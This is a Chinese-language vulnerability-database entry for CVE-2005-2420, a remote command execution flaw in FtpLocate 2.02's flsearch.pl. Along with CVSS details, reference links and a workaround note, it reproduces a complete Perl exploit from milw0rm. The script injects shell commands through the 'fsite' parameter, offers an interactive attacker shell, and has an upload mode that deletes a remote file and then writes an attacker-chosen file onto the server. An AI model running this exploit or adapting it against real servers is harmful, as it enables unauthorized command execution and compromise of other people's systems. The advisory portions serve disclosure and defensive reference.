CVE-2005-2420
CVSS10.0
发布时间 :2005-08-03 00:00:00
修订时间 :2016-10-17 23:26:53
NMCOE    

[原文]flsearch.pl in FtpLocate 2.02 allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTP GET request.


[CNNVD]FTPLocate 'flsearch.pl' 远程命令执行漏洞(CNNVD-200508-028)

        FtpLocate 2.02中的flsearch.pl允许远程攻击者可以借助于HTTP GET请求中的shell元字符执行任意的命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2420
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2420
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-028
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112230697123357&w=2
(UNKNOWN)  BUGTRAQ  20050725 Chroot Security Group Advisory 2005-07-25 -- ftplocate
http://securitytracker.com/id?1014570
(UNKNOWN)  SECTRACK  1014570
http://www.securityfocus.com/bid/14367
(UNKNOWN)  BID  14367
http://xforce.iss.net/xforce/xfdb/21540
(UNKNOWN)  XF  ftplocate-fsite-command-execution(21540)

- 漏洞信息

FTPLocate 'flsearch.pl' 远程命令执行漏洞
危急 输入验证
2005-08-03 00:00:00 2005-10-20 00:00:00
远程  
        FtpLocate 2.02中的flsearch.pl允许远程攻击者可以借助于HTTP GET请求中的shell元字符执行任意的命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1120)

FtpLocate <= 2.02 (current) Remote Command Execution Exploit (EDBID:1120)
cgi webapps
2005-07-25 Verified
0 newbug
N/A [点击下载]
## Alot of code for a cgi | vuln. 
# /str0ke

#!/usr/bin/perl
#
# FtpLocate <= 2.02 (current) remote exploit
# VERY PRIVATE VERSION
# DO NOT DISTRIBUTE
#
# newbug Tseng [at] chroot.org
#

sub my_socket
{
       my $s=IO::Socket::INET->new(PeerAddr => $host,
                               PeerPort => 80,
                               Proto => "tcp") or die "socket: ";
}
sub ch2hex
{
       $chr = $_[0];
       $out="";
       for($i=0;$i<length($chr);$i++)
       {
               $ch = substr($chr,$i,1);

               if($ch eq "\"")
               {
                       $out.="%5c%22";
               }

               elsif($ch eq "\$")
               {
                       $out.="%5c%24";
               }
               elsif($ch eq "\@")
               {
                       $out.="%5c%40";
               }
               else
               {
                       $out.="%".sprintf("%2.2x",ord($ch));
               }
       }
       $out;
}
sub upload_file
{
       print "local file: ";
       chomp($lfile = <STDIN>);
       print "remote file: ";
       chomp($rfile = <STDIN>);

       my $socket = &my_socket($host);
       print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
       close $socket;
       print "remove $host:$rfile done.\n";

       my @DATA = `cat $lfile`;
       $num=1;
       $total = scalar @DATA;
       foreach $DATA (@DATA)
       {
               $DATA = &ch2hex($DATA);
               my $socket = &my_socket($host);
               print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
               print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";
               sleep(1);
               close $socket;
               $num++;
       }
}
use IO::Socket::INET;

print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "")
{
       $port = 80;
}
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
{
       $ver = "1.0";
}
print "cmd/upload (cmd): ";                                                     chomp ($opt = <STDIN>);
if($opt eq "")                                                                  {
       $opt = "cmd";
}
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
{
       $cgi = "/cgi-bin/ftplocate/flsearch.pl";
}
if($ver eq "1.0")
{
       $junk = "HTTP/1.0\n\n";
}
else
{
       $junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n";                                        }
if($opt eq "cmd")
{
       while(1){
               print "h4ck3r\@[$host]:~\$ ";
               chomp ($cmd = <STDIN>);
               if($cmd ne "")
               {
                       print "Send command \"$cmd\" to $host ...\n";
                       $socket = &my_socket($host);
                       $cmd =~ s/\s/%20/g;

                       print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
                       print "done.\n";
               }
       }
}
elsif($opt eq "upload")
{
       &upload_file($lfile);
}
	print "done.\n";

# milw0rm.com [2005-07-25]
		

- 漏洞信息

18305
FtpLocate flsearch.pl fsite Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

FtpLocate contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to flsearch.pl not properly sanitizing user input supplied to the 'fsite' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2005-07-25 2005-07-15
2005-07-25 Unknow

- 解决方案

Currently, there are no known upgrades or official patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): apply the unofficial patch supplied by Chroot Security Group in their advisory.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站